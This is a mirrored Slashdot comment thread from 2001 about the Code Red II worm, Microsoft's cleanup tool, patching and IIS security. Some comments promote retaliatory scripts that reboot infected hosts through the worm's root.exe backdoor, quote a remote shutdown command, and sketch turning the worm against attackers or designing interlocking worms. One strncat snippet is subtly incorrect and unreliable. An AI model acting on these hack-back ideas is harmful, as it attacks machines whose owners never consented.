Slashdot Mirror
Code Red: the Aftermath
LiquidPC writes: "Microsoft has released a tool to help clean up the effects of the Code Red II. It removes the files and mappings installed by the worm, and reboots your system; it also gives you an option to permanantly disable IIS." So, Microsoft has given you a mop to clean up the mess they made. Start mopping! If you're not the one infected, just tired of seeing your Apache logs fill up, you might see this page.
The worm only stays resident in memory after you are infected. Therefore, you are instantly clean after a reboot. It _does_ not stay anywhere else except RAM, which is cleared when you reboot.
But the trojan modifications by the newer version of the worm are permanent, and will NOT be removed by rebooting and installing the patch. The patch just prevents reinfection by the original buffer overflow bug.
Look here for a tool to TRY to clean up the system.
But note that once the system has had the FIRST backdoor installed, that may have been used to install other backdoors, unknown to the author of the cleanout tool. And in infected machine is advertising its vulnerability to the entire net by the infection attempts it makes.
The only real solution is to reinstall the whole machine, and install the patch before going live on the net.
(And while you're at it - why not install Linux or a BSD instead, and switch to the Apache web server, which doesn't HAVE this problem.)
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Second, that FUD about service packs re-breaking the OS is just garbage. Please give me ONE example, JUST ONE, of a service pack opening up new holes for ANY WINDOWS OS, 3.1 and up. You can't because you are a paid basher talking out of your ass. Service pack 2 for NT Server made it so my machine rebooted the 2nd time I accessed a device on the floppy controller. Streamer or floppy -- first access is fine, 2 seconds after the 2nd access I was looking at a black screen and the PC was doing a POST (read: no shutdown, just an immediate reboot). SP3 fixed it, and it wasn't there pre-service pack. When I worked at a major law firm in Atlanta, our DC office had a ton of hard-to-reproduce problems related to the BDC over there. Turns out the admin installed SP4 when it came out because he trusted MS releases. Uninstalled to SP3 and it was solid as a rock. Put SP5 on and it was still great. SP6 sucked, but 6a was just fine (except it broke the way some NT boxes routed, apparently). So maybe the rule is to avoid even-numbered service packs.
My point is this:
MS is now on the brink of a win so big that they will be nearly be unstoppable, possibly even by the government, once it happens.
This is, of course, .NET, which would give them a strangle-hold on ecommerce, and a hand in the pocket of nearly everyone on Passport.
MS, and even Passport, have had huge security and service blow-ups in the past (Hotmail outages, etc.), and it hasn't even been a blip on the radar as far as most average people are concerned. It hasn't even registered on a corporate level, outside of the IT departments, who are just being blamed by the executives for not taking "proper care" of their single-platform fiats.
Now, a high-profile virus that keeps going on and doesn't go away (like, for example, Code Red)and forces the public's attention on the issue and becomes a constant and increasing embarassment to MS as it continually claims to have fixed the problem just before a new version shows up.
Now, people have this in their heads, even if it is the wrong way. ("That evil Russian hacker wrote this awful virus that takes over my computer.") The point being, that even executives will start to notice it, and may take the time to read their half-page summary sheet on the problem that it only affects MS, especially their new products that they want everyone to upgrade to.
Ultimately, only a sustained, media-covered security crisis will have any sort of effect on MS. Public opinion will only be turned when the average user is affected by it. It will happen after .NET launches and the first hack happens that compromises personal data, but it won't matter unless it happens *before* then.
Just a thought.
"Enough of this wretched, whining monkey life." -- Marcus Aurelius, _Meditations_, Book 9, 37
Blame the bozo who designed strncat!
strncat() isn't a problem by itself. The problem is improper usage patterns.
When you're builiding a string by repeated strncat()s to a buffer, and you don't have guarantees about the size of the things you're concatinating, you need to prevent (or check for) overflow, something like this:
strncat(dest, src, MIN((BUFFSIZE-1)-sizeof(dest), chars_wanted_from_src));
Without such an example in the man page it's easy to forget to guard against buffer overflow. And once code is writing with guards for overflow the guard code will serve as a reminder to later programmers maintaining or upgrading the code.
But strncat() isn't the main culprit.
Most of the buffer overflow attacks come from reading an input using gets(). That bad boy should have had a buffer size argument, ala fgets(). And it's the decision to keep it in the standard library "for compatability" that causes all the pain.
The gnu compiler will warn you if you use it and the man page has a warning, so there's no excuse for it to show up in new code any more. And there's no excuse for not fixing ALL the warnings in a piece of production code, or for using (or writing) a compiler that DOESN'T warn about gets().)
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Shouldn't be too hard to alter one of the standard installers to:
What have I forgotten?
Got time? Spend some of it coding or testing
...about this not being Microsoft's fault. 90% The machines running code red have no system administrators, because they are home machines whose owners have no idea they are even running a web server? Why? Because Microsoft, in its miniscule wisdom, installs IIS (silently, and in the default zero security mode) whenever the user installs any of various pieces of Microsoft software.
Everyone is saying, "blame MS", and "blame the virus writers," and/or "blame the trained monkeys." Everyone has it all wrong. All these people are responsible. MS is for having an OS that allows such exploits to be performed, and for telling people that it's easy and doesn't require skill to keep a server up and running (if you make it easy enough for a monkey to do something, monkeys will do it!). Second, the virus/worm writer, for writing it, and 3rd, the idiot monkeys for playing with something they don't have the skill to play with, and infecting each other. (Maybe like AIDs - people/monkeys play as they shouldn't, infecting each other... and everyone suffers for it.)
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
As a sysadmin for a couple of Linux web servers, I have been monitoring this site and others to see what everyone else is doing about CR. Up to now, I have gathered that the general feeling was one of moderation: ie., to try to notify the sysadmin of the offending site and wait until they patched or fixed their equipment.
Now, the feeling seems to be shifting. According to this message and its threads, scripting a reply to reboot the machine is accepted as a response. I am still not comfortable with this but I am willing to go along with the group.
What does everyone else feel about this?
What is the point of your message? Do you think
posting it enough will make such lazy sysadmins
go away?
The rest of us applied the patch supplied by Microsoft more than a month before CR came out...
:)
And were still vulnerable until we disabled URL forwarding.
The Microsoft patch alone is not useful. You are still at risk. See Incidents home page
I'm so sick of people blaming Microsoft. The released a patch well before Code Red. Get over it.
Microsoft STILL hasn't released a patch that makes their webserver secure and allows URL forwarding. Their patch has its own security hole !!
Blame Microsoft, or simply use Internet server software that is secure. All mine is written by Dan Bernstein
My company is running IIS 5. Perl is running on the system, and I'd like to create a script that will take any requests for default.ida and add the IP to the list of IP addresses the IIS server blocks.
While we're at it, can the net send command be used to inform the infected system of its "condition" without resorting to exploiting the Code Red II install of root.exe?
Anyone have any ideas for using Perl or ASP to do this?
"Live Free or Die." Don't like it? Then keep out of the USA
It definitely isn't over - Code Red Vigilante still reports dozens of attempted Code Red II attacks. Hopefully, at least some of the decaffeinations get through and get people to patch their machines.
Port 80 may still be blocked by @Home, but I'm still getting attacks from other @Home customers. When are @Home's admins going to start cutting off the connections of infected machines? It's drastic, but it seems to be the only way to get the attention of some people.
Meldroc, Waster of Electrons
That's Slashdot's posting code trying to prevent really long strings from ending up in posts and screwing up the HTML table layout.
There are many other options when using srings in C, you are not required to use a limited array of char.. in this day, if you are security concious, you should consider all the possibilities when writing a program.
Then there is a nice little Vulnerable Server Scanner Provided by the people at www.eeye.com.
It basicly looks for Vulnerable servers so that network admins can track them down and get the web admins to patch the machines before they get infected.
Nice to see someone has come up with a clean, pro-active method to kill this little menace off.
clicking on that link does NOT reboot your machine even if you are infected.
the reboot stuff only triggers when an infected machine tries to break into the machine running that script.
Blame Alan Turing, he invented stored-program computers...
I'm on Win2K Pro right now, freshly installed last night. IIS is not running, because it isn't installed by default. You have to go to Add/Remove Programs and install it yourself. So how the heck do the Win2K Pro boxen that people run somehow spontaneously install IIS on them without their knowledge? IIS is installed by default on the server varieties of Win2K, but these people shouldn't be running those. So I wonder, what's going on?
It attacked the brainstems of morons who had left notoriously insecure network-daemon software running unpatched for a year or more. That's what we call being too stupid to live.
Rick Moen
rick@linuxmafia.com
This is what happens when you give admins a false sense of security.
After all, they became an MCSE after a couple months of hitting the books, rather than a few years of hacking old hardware. They got a certificate and the sense that the Microsoft way is the best way - If you don't understand what a dialog box is asking, just hit 'Enter' and go with the recommendation. That's how IIS got installed on all of those PCs and this 'Default.ida' nonsense too. I still don't know what a 'default.ida' is used for, and I'm a pretty technical guy. - Something to do with indexing? Whatever.
Some of my friends are MCSEs. - Not all of them are 'hackers' who actually watch what happens in their systems. They trust that MS will send them a shiny new CD with a 'Service Pack', along with a few other goodies to play with when an update is needed.
The problem is compounded by the fact that these Win2K CDs got passed around - Microsoft knows this and whether or not they admit it, it's part of their marketing. From what I've seen, I'd suspect that the bulk of the problems are coming from the home users who are running a borrowed copy of Win2K on their PC/Cable Modem setup. The ones who don't get the service packs and don't log into Microsoft.com too read the bulletins for fear of being asked for proof of purchase.
You Microsoft has these thousands of unlicenced customers that they know are using their software in a dangerous manner - Everything installed, every service running - all the lights on, but nobody home. What is MS's liability?
With all of the talk about the signifigance of an AOL icon vs. an IE icon on the desktop, MS *knows* how people will react when running an install - They know that if the user gets a dialog that says "Activate IIS?" that an unsure user will probably say yes, even if he has no idea what IIS is or what the risks are.
Microsoft has got to accept the blame for this mess - It is their doing.
Unfortunately, this is the first step in the process of requiring people running servers of any kind to be *licenced* - Now won't that be fun?
Cheers,
Jim in Tokyo
-- My Weblog.
IIRC, any MS machine that is a non-server OS will only allow 10 network connections, so I'd think that the PWS servie would fall under this limitation.
I mean Michael went to all the trouble to link to such a script and all, a few tweaks and you've got what you asked for.
It's a pointless enadeavour though. Of the 1300+ unique hosts that have bounced off my apache machines in the last ~70 hours, only 10 seem to actually be accepting requests for root.exe... the rest throw back either a 404 or a 403, with alot refusing connections, or just returning a "server overloaded" message. Of those ten accepting requests for root.exe two returned some kind of funny response, one redirected to goatse.cx, and the other seven seemed to actually accept commands.
Well, the first item in that list isn't actually an Apache exploit. It's a piece of trojan code that people are tricked into running by telling them that it's an exploit detector.
If you expect a count of google hit results to somehow bear any weight in this argument, you're an idiot. One, any given exploit will have 5-10 hits as google indexes mailing list archives. Two, it will catch all mention of 'Apache' and 'exploit' whether or not the thing being mentioned really IS an Apache exploit.
Need a Python, C++, Unix, Linux develop
The Windows GUI follows many of the same design principals that Mac followed for years which is why Apple never marketed the Macs as servers-- the abstraction is great in a workstation but in a complex server environment it is dangerous not to have the ability to participate in the system in the way one does with UNIX. Apple sold servers too, but they ran on UNIX.
Now you have trainied monkeys who think they know everything about NT, which really ammounts to "reboot when it bluescreens." They think that they are secure because of the quality of Microsoft's software. Yet they don't know really how TCP works so they have no clue how to begin to think about security from the outside-- all they know is security from the inside which is all the exams cover, and all Microsoft want's you to think about because that is where they have the most features (yeah, if yo can break in from the outside, you can break in from the inside, though).
So now, Microsoft has issued a patch to remove a backdoor-- one loudly advertised. Where is the ecurity in that? They should have, on their web site, in no uncertain terms, exactly what their engineers are telling their customers and exactly what the rest of the security community is saying: If you are infected, reload your computers.
There is false sense fo security in using this patch. Your IIS server has a backdoor which was heavily advertised to the net. Anybody could have installed another backdoor and you, as the admin would probably never find it. Not, at any rate, until someone used it to deface your site, publish your confidential information, destroy critical information, or other such activity...
LedgerSMB: Open source Accounting/ERP
Criminals subsequently come up with a version of bullets coated with a Teflon derivitive. Manufacturer sends out information that they've an add-on spray that will prevent these new bullets from penetrating their windows. Unsprayed windows will NOT stop these new bullets. You don't get this spray and apply it. MAYBE YOU DON'T EVEN REALIZE THAT YOU'VE GOT BULLET PROOF WINDOWS. Criminals start shooting random windows. They don't actually do much, just shoot the windows. Is it the manufacturer's fault?
Vintage computer games and RPG books available. Email me if you're interested.
That is a really stupid place to optimise. I bet it barely shows up on profiling at all, compared to memory management and offscreen bitmap drawing :)
Blame the bozo who designed strncat!
This may not be the cause of this particular overflow, but it causes a very large number of them.
The main reason you'd use strncat rather than strcat is to avoid buffer overflows, yet instead of the obvious choice of feeding it the buffer size, you have to feed it the maximum number of characters to add. So to use it to prevent buffer overflows, you not only need to remember the buffer size, you have to track the current string length!
Avoid strncat! Even if you understand it, someone who changes your code might not.
Make something more intuitive:
char *buf_strcat(char *dest, char *src, size_t buflen){
char *cur=dest;
int i=0;
while(*cur && i<buflen-1){cur++; i++;}
while(*src && i<buflen-1){*cur++ = *src++; i++;}
*cur='\0';
return dest;
}
---
You'd be surprised at the broadband connection available to things crawling around in your hair.
I've had similar thoughts. I've been reading Multiagent Systems: A Modern Approach to Distributed Artificial Intelligence and with the Code Red outbreak, I've taken to reading it with malware in mind.
What I've come to realize is that a worm could become real scary if its author, like me, were to be a fan of multi-agent systems. There's a plenthora of research on agent-to-agent communication, just waiting for that big experiment to take place.
Ponder this: interlock. The worms work together to reach a situation in which a host cannot be cleaned without data from another host, and vice-versa, thus making disinfection extremely hard
I've been sketching on scenario where relationships are created via the infection plus one level. if A infects B (first level of interconnect), then B would tell A about every other host it infects in turn (second level). These hosts would form a cluster, where each member is free to initiate contact with another and request services.One of these could be the encryption or decryption of data. Hosts would say "Please encrypt this data (hands it over) and return the encrypted result". Say host A tells host B this. Suddenly we're in a situation where we cannot simply disinfect host B, because if we do we'll lose the key that decrypts data on host A! Of course, the worms would negotiate the complement, and host A would contain the key to unlock data in host B. We then expand this scenario to a great interconnection between members of the cluster. We can strengthen the connections by allowing unrelated hosts to negotiate interlocks.
In the same vein worms can negotiate and divide the search-space between them. Each worm could contain a compressed/simplified representation of the IP-search-space (just a couple of masks maybe? Haven't thought too hard about it). Relatives would communicate which parts have been scanned as to not duplicate (too much) work. This then becomes a parallell binary search!
I think I'm gonna have to write a short doomsday article too, there's just so much cool things that someone wicked could do.
Belief is the currency of delusion.
We need laws to make software companies liable for one reason -- US software already has a reputation for being of poor quality [read microsoft]. In 5 years that could become a SERIOUS economic issue for the US, maybe german software will become the avant guard (like german engineering is thought of now), or japanese software will be the highest quality (like japanese steel is now). And suddenly we'll find outselves out of the software market like were out of the car market and out of the electronics market
Free Techno/Jazz/DNB/MI Music by guys obsessed with monkeys!
The headline implies that the whole Code Red experience is over. I know everybody wants it to be over, but it doesn't seem to be over from where I'm sitting, looking at the sheer volume of logged packets hitting my firewall. So Microsoft has released a solution to the Code Red II worm. That's great, but now try to get most of the infected users to use it. I haven't seen any slowdown in probes from infected machines yet, so I'll believe it when I see it.
-- Never hit a man with glasses. Hit him with a baseball bat.
- 2001-08-11 13:18:46 Warhol Worm proposed: 15 minutes to total infection! (articles,bug) (rejected)
SinceHere's the scoop (more meat at K5):
Using your sig line to advertise for friends is lame.
This is a bigger fix than one might think. At the university at which I work, the major problem was not the sys admins who did not patch their servers, it was the professors who had Win2K Professional on their workstations with IIS on and didn't even know it. Some of them knew about the worm, even made sure that the department's IT teams patched their servers, but did not know that they were running a web server in their office, let alone that they were infected.
I'd rather have someone respond than be modded up.
Isn't it funny that they released a bonehead tool just after they found out that their own admins are boneheads?
Let's see. I install Win2K Pro. I start setting it up with some degree of security, install a few apps. It occurs to me to check for updates (it had to do with getting strong encryption in Win2K), so I download SP2. I install it, or try to. Partway through, it decides it can't find its files, no matter how many times I point to it. So I cancel, and then it can't find the files it needs to undo what it did. Again, telling it where the files are does no good.
Start over with installing Win2K Pro, but the SP is either the very next step or will not happen.
In retrospect, it could have been that I removed permissions from Outlook Express (obviously an essential part of the operating system).
I can certainly understand how anyone would be paranoid about installing something in Windows.
CAUTION: Product may be hot after heating
I always found it funny the RH worm was called 'Ramen', which is the plural of 'Raam' or in English: 'Window'.
Never underestimate the relief of true separation of Religion and State.
www.eros-os.org.
When we can run the microsquish shit under emulation, on an OS that offers real security, then viruses, trojans, and worms become infeasible.
On EROS, there's no reason for an app to have a write capability to its own code space: ergo, no worms.
-jcr
The only title of honor that a tyrant can grant is "Enemy of the State."
The patch was available a full month before Code Red 1 popped up. Off hand, I'd say that it's not Microsoft's fault. Or look at it this way. Red Hat 6.x is filled with known holes. If I install it on the public internet, is it Red Hat's fault, or my fault, for using it?
Vintage computer games and RPG books available. Email me if you're interested.
The real fix is to install some other web server. If it supports PHP you can also migrate your VB ASP scripts using ASP2PHP. But maybe you don't want to drag extinct-but-doesn't-know-it-yet methodology and technology across to your shiny new server?
And... since you're changing such a major server component, why not change the whole server so that you're not, one day, forced to upgrade to Windows XP and bleed money for insecure software for the rest of your life? Install Service Pack MAXINT today!
Got time? Spend some of it coding or testing
Talking about rebooting - check this news.com video out.
Everybody but Bill Gates thinks it's pretty funny :)
This says nothing about the character of IIS Admins, its about admins in general. And more importantly, people running this thing who don't even know that they have it running.
Here is what they should have done to get this thing patched quickly.
"Everybody running a version of Windows on their computer should go to http://windowsupdate.microsoft.com , and download all of the items in 'Critical Updates' (which has the security patches selected by default when you first load it anyway)."
If you are vulnerable to Code Red and your a home user, the patch appears in the list of updates and will be installed. If not, well no harm done.
Thats the whole point of Windows Update, if we could just get people to go to it even if they don't think they are open to Code Red, we could put a stop to this thing really fast.
Thats the problem here, not IIS. A bunch of clueless home users who don't know whats going on and have no reason to check because of the way its being reported will not be the downfall of IIS. If Linux had any amount of home users to speak of, we'd see the same sort of problem among them eveuntally.
-- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
So first Microsoft says this in the description of the tool:
Microsoft has developed a tool that eliminates the obvious damage that is caused by the Code Red II worm.
Then they say this:
MICROSOFT RECOMMENDS THAT INFECTED INTERNET-FACING SERVERS BE REBUILT ACCORDING TO THE GUIDELINES PUBLISHED ON THE CERT WEB SITE.
It should be noted that among other things in the CERT guidelines, they tell you to do a clean install of your OS after you've been comprimised. So what's the point of this tool if MS thinks you should just R&R your OS anyways?
I posted to
Has anyone begun to think that perhaps Microsoft themselves has planted CodeRed and variants out on the internet? Before you mod me down, read on:
CodeRed, the first version was fairly lame, and didn't infect beyond a separate IP block. Microsoft gets scared and realizes that their "iminent" release of WinXP might be blocked, or worse yet, shunned by the consumers. "Oh no, now we can't track all those stolen copies of Windows".
Then CodeRedII comes out, a bit nastier, going after more machines. Then Microsoft is denied their appeal.
CodeRedIII comes out, infection is much worse, and now opens the machine up to more attacks than before. It gets so deep into your Windows system that you must reinstall anyway. Not only that, but allows anyone who reads their logs to go in and cause damage ("polluting blame" as we say). Now compromised machines are being hacked in many more ways than just being opened up.
What does Microsoft recommend? You download this "patch" (audit tool) which you run and then it "cleans" (audits) your system, then as their own CERT document recommends, you reinstall your OS (i.e. find your original, licensed install media, and hit our website for the latest (intentionally trojaned) copies of drivers and IE/ActiveSetup installation tools).
What's a bit odd about this process though, is that Microsoft requires that you run their "cleanup" tool to purge the infection, THEN reinstall. If I'm going to fdisk and reinstall anyway, why do I have to run this "cleanup" tool? (audit?)
Curious that nobody has thought of this angle. Why do we not hear about hundreds of FBI agents tracking down the author of the virus in the Faroese Islands or whatever. Usually these people are caught within days of the outbreak. There hasn't been a single peep about any investigation in two full weeks. It's not like we don't have a HUGE audit trail, we all have dozens of logs. Plot it out, find the dates/times, narrow the search,and find them.
Oh wait, perhaps they're the same entity which supplied you with the infectable OS in the first place.
What was that they were saying about Linux being "potentially viral" a few weeks ago?
I haven't examined the script yet but Perl will run under windows. Not sure how you'd give it control of .ida though.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
When you buy a house, you know for a FACT that glass will break when hit with a hammer.
The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.
Many people look to buy house in a "safe" neighborhood. Most people want cars with a good "safty rating". People install alarm systems in their homes and cars to make them "safer".
You know what... none of that works either. Determined people will always find a way to break things. It doesn't matter if it is a house, a car, an alarm system, or an operating system.
You simply shouldn't try to blame one entity for the malicious acts of another.
When will Windows be ready for the desktop?
It seems to me that a GOOD ADMIN would have any important data backed up prior to installing/upgrading any mission critical servers. Just because you're a negligent moron doesn't mean that Windows sucks. You're correct that a "Good Admin" would back their data up before performing a system upgrade / patch.
However, in this case, Windows DOES suck, regardless of the (moron|genius) at the keyboard.
Any system that *requires* OS updates to be bundled and installed along with the application (IIS) updates is broken. It matters not if you have an intern "administering" the box or a 10-year-vet.
If, for some reason, the latest bugfix from Apache broke compatibility with a current or previous Linux kernel, I can always pop a new kernel in there. On my own time. Checking to make sure that none of my other apps will break. Even if I'm not paying attention and blindly upgrade Apache without checking its deps, I'm left with an unusable Apache - my data is still there. I can just backpeddle to my previous Apache and I'm up again.
Not so with (2K|NT)/IIS. Install SP, hose machine...reinstall...
One of these situations takes a little more time than the other...
Seriously, we don't need standard library routines. What use is printf() anyhow??
I got this mail, and the problem is that people are WAY TOO STUPID to know what to do. If the microsoft patch can tell if it needs to do anything or not, RR and @home security should point everybody to it.
From: security@cfl.rr.com
To: Our Valued Customers
Subject: Security Notification
ROAD RUNNER ALERT
VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED.
Dear Road Runner Subscriber:
Road Runner, like many other ISPs and, indeed, the entire Internet, has
experienced an attack on its network that apparently is attributable to a
strain of the Code Red virus. It is possible that this virus has infected
the PCs of Road Runner customers using the Microsoft Windows NT Server or
Microsoft Windows 2000 Server operating systems. Infected PCs may
continue to flood the Internet and the Road Runner network with
virus-generated messages (even without your being aware of it).
Road Runner is working to alert all of its subscribers to this problem
and to instruct them on where to find and install the patch necessary to
eliminate the virus. In the meantime, Road Runner customers may
experience slow network response, flashing data lights on their cable
modems, and other symptoms (such as unusual port scan log activity or
increased firewall activity) while Road Runner and the Internet community
work to control the impact of this virus.
IF YOUR PC IS RUNNING WINDOWS 2000 SERVER OR WINDOWS NT 4.0 SERVER,
PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE
(www.microsoft.com/security) AND RESTART YOUR PC.
IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOUR
ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART.
We ask for your patience while Road Runner continues to work with the
Internet community to address this virus.
Thank you.
Road Runner Security
Unfortunately, I don't think that script will work. I don't have an IIS box to test on, but my NT 4.0 workstation will not shut down with that `rundll32 shell32.dll,SHExitWindowsEx 5' command. I get a dialog box to pop up saying ``Error in shell32.dll Missing Entry: SHExitWindowsEx''
I have a PHP script set up to do a `net send %COMPUTERNAME%'. If I can find an FTP server with Microsoft's new tool, I may start downloading that with an FTP script and running it.
However, I also heard that IIS doesn't run with many privileges at all on Win2k boxes. It may not be possible to do anything at all.
" it also gives you an option to permanantly disable IIS..."
About time Microsoft showed people how to secure a Windows web-server! Turn off the web daemon! *sigh*
If you truly are an NT server admin than I pity you. While you spend half your day researching and applying patches to your servers, BSD and Linux admins get to play around with the really fun stuff.
Hrm, I seem to recall the Morris worm exploiting a Sendmail vulnerability. Patching sendmail hardly seems like "play[ing] around with the reall fun stuff." Not to mention the recent BIND hole...
10 PRINT CHR$(205.5+RND(1)); : GOTO 10
So it probably would be a good idea for anyone to send every host that comes in searching for default.ida at least one reboot command to make sure that patched machines dont bother us again.
/. user set up a script to do this automatically. - He/She is using a similar technique to one that I've already tried. For some reason it doesn't work.
The root.exe left in their scripts directory would be their own problem.
No, this is another common misconception. The exploere.exe trojan makes Code Red ][ infected machines survive the reboot.
Also I've seen many people expressing that they could stop the IIS service. I have tried this and it doesn't work.
I've even seen another
Files on an infected machine, can be accessed via the http://lusers.ip.net/scripts/root.exe, but there are restrictions as to what you can do.
The infected machines are Win2k (ie WINNT based) - if they're running NTFS then there are specific permissions on the file directory structure. I believe that this restricts what you can do with root.exe.
Comment removed based on user account deletion
There is a big difference between an "normal" EULA and the GPL:
The GPL grants you the privlege of copying, redistributing, and making derivitive works of copyrighted material, in exchange for agreeing to certain provisions. You only need to agree to the GPL if you want to do one of the above. When you buy GPL software, you are buying the software. If you so choose, the GPL provides you with a superset of the rights you atomatically get by buying a copy.
"normal" EULA's attempt to specify how you can and can't use the software in any case. They claim that you haven't purchased a copy, and you don't have the right to use the software as you wish.
Whether the courts would choose to recognize this distinction depends on how much corporate america bribes them.
In any case, this has no direct bearing on the liability issue.
Looking through my logs, I think it's more likely that it is home users that are infected now, a lot of DSL users on dynamic IP addresses are hitting me.
.ida exploit against you, popping up a Net Send message on the computer, so hopefully someone will notice and patch the machine...
I haven't seen it posted here on Slashdot yet, but there's a neat little Java Applet (it's even GPL) over at:
http://www.dynwebdev.com/codered/
It auto-replies to any machine that tries an
When in danger or in doubt, run in circles, scream and shout. --Robert A. Heinlein
From: Support@iis.microsoft.com
To: Registered_Users@iis.microsoft.com
CC:
Subject: RE: IIS Code Red Worm Patch
Attachment: Instructions.doc
Body:
Hi, how are you?
We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructionsin a easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.
If you have any advice on this file, please email us back!
See you later!
Once your system has been compromised in this fashion, the only way to be sure is fdisk, format, and reinstall.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Linking to a page that could potentially shut down/restart your machine without warning is rude, virus or not.
~jeff
No, no, no.
When you buy a house, you know for a FACT that glass will break when hit with a hammer.
The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.
Your analogy just doesn't do justice to the situation.
Rich...
Ignore Alien Orders
Code Red is not the problem, it is the symptom. If Microsoft had fixed the problem before there was a problem, then the buggy version of IIS never would have shipped.
However part of the problem is the use of huge monolithic programs, which attempt to do everything including the "kitchen sink". For quite a while with Windows we have been seeing what amount to explots through "bells and whistles". Frquently where most people don't even know something is even there...
That only works if the server is infected by the version that installs the trojan.
With a little more work one could take advantage of the fact that being infected by any version of the worm shows the server is vulnerable to the original buffer-overflow attack. So one could:
Get a copy of the worm.
Modify it to take the web server down (or whatever) rather than infecting it.
Install a launcher for it as default.ida in the document root of your webserver.
Note that by now any worm-infested machine - benign or backdoor version - may have several diverse rootkits installed. So it should be reinstalled (preferably with linux or a BSD and apache B-) ) rather than cleaned out and patched. And a machine infected with the benign worm, if merely crashed, will no doubt be brought back up and eventually infected with the backdoor-installing version.
Some authors of retaliatory-strike software will no doubt chose to disable the web server on a more permanent basis - as by removing the unpatched DLL (along with the several backdoors the worm installs - see a patch tool here) - rather than merely shutting it down.
While this may get them in trouble, chosing to reformat the drives would be a hostile action, since it might destroy unbacked parts of the web site. (It would also likely lead to the administrators installing a backup, complete with vulnerability. So it is a less effective retaliatory strike.)
Finally: I do NOT recommend actually doing this, as it may be illegal. The more damaging alternatives certainly are illegal (and also unnecessary, given the availability of less damaging alternatives).
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
I'd be interested in seeing how the sales of Code Red have correlated with the public's awareness of Code Red.
Alex Bischoff
HTML/CSS coder for hire
When a box has been cracked, you need to do a complete reinstall, as you can never know what backdoors has been installed. Sure, you can remove RCII, but while it was active, it would only take even the dumbest script kiddie a couple of requests to install another backdoor.
QUESTION: If Joe/Jane Consumer running whatever OS/Apps that exist suffered as a result of the Microsoft Code Red I & II Worm can he/she sue Microsoft for losses???
IMPORTANT NOTE: Joe/Jane Consumer did NOT sign/accept/whatever an EULA associated with Microsoft Web Server. Joe/Jane was just "harmed" by the poorly designed, fault ridden, Microsoft Server Software. Joe/Jane NEVER signed/accepted/whatever the EULA associated with the poorly designed, fault ridden Microsoft Server Software.
I believe Juanita
No, they'd need access to the subnet, not the machine. The security issue isn't with the machine that was patched, but the machines it communicates with
There's also a 6a, which is why I wasn't sure whether it was 5 or 6.
I don't know how much the issue is "new security holes" from the patch but "will it still work?". Look at 5->5a, 6->6a, DX8->DX8a, 3(!) attempts to fix that hole in Exchange, etc. Every MS patch needs to be regression tested on a non production box before being really attempted. It's too dangerous to do otherwise. It's also too dangerous not to immediately patch now as well. SNAFU.
Blame the creators of C.
They're the ones who are responsible for buffer overflows.
Trolls throughout history:
Jonathan Swift
IIS is written in Visual Basic...
Do not look at laser with remaining good eye.
Blame Microsoft!
Even thought the kiddies did it,
Microsoft will take shit for it!
Well, they're not a real company anyway.
(apologees to the southpark people)
"
Any good admin would have important data backed up prior to installing.
"
How do you back up the IIS settings on NT 4?
Answer - you can't.
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. (Einstein)
it also gives you an option to permanantly disable IIS
Red Hat must be pleased that Microsoft is now bundling the Red Hat installer with their newest patch...
"It's the mess left by lazy admins who can't be bothered with security patches a month before a worm comes out to exploit them. Shame on the NT admins."
Does this really surprise anyone? MCSE's are trained (and tested) to solve everything by "reboot, reload, reinstall", because Microsoft's way is to "take the easy way out" instead of actually FIXING the problem.
And, so many MS service packs BREAK servers and software when installed, can you also not blame people for NOT rushing ot install them? Even where I work, where we do OS compatibility testing on servers we don't start using new MS service packs until they've been tested and found safe by our internal test group...
I for one expect use of IIS to drop as a consequence of the Code Red virus... Were IIS open source, these holes and backdoors would have been seen LONG ago and fixed. Apache runs MUCH more of the web than does IIS, yet you don't see anywhere near the number of bugs, exploits and DOS worms as does IIS.
=== The price of freedom is eternal vigilance
Its true that Microsoft put out a patch before the virus took off, so that's a good thing. But Microsoft releases patches all the time, and that is a bad thing. I'm on the security mailing list from MS, and I get at least 3 or 4 alerts a week. I'm also on the slackware list, and I have received 3 or 4 alerts in the last six months.
The reason for this is because Open Source projects tend to fix their security bugs before they are released. If Apache shipped with something that allowed this kind of remote exploit in one of the 2.0 betas, there is a better chance that someone else out there will see it. What is the chance that someone can do an independent security audit of Windows XP?
Closed source can be perfectly good at closing holes, if the company is as big as Microsoft. But Open Source is much better at closing those holes before they are shipped: many eyeballs make all bugs shallow. Open Source doesn't catch every bug, of course; but enough are found that when the odd hole is announced, it is a big enough deal that the patches are more likely to be installed.
Closed Source hurts Microsoft security in more ways than one. Not only are all default installations compromised, but since so many new patches come out every week most admins don't keep up with them. While this is partially the admin's fault, it is also the fault of the software model that prevents these problems from being found quickly.
-Mike
PS: how do we know that "Microsoft fixed the problem before there was a problem", anyway? The patch came out before this big worm hit, but how many servers were quietly compromised in the last year?
That's actually when I got this message - but I felt a need to post it today just to demonstrate what retarded "admins" have to ignore in order to distribute Code Red.
the patch worked, it cleared my server of any problems, but it did report if failing to complete. Either way I can no longer "get root" via a webserver, and www.securityspace.com reports im clean. Now I just sit and wait for the next one! (Actually, compound this with the fact that my entire company depends on RHYTHMS, it has been an EXCITING week)
________________________________________________
This is spot on. Changeover to IPv6 (with its larger address space) would have stopped Code Red before it even started. A worm would take years on IPv6 to find another host to infect. IPv6 would put an end to random port scanning too.
A computer is a tool. You have to learn how to use it properly. Do you go around demanding that 747's be made so easy to fly that every office worker could do it ?
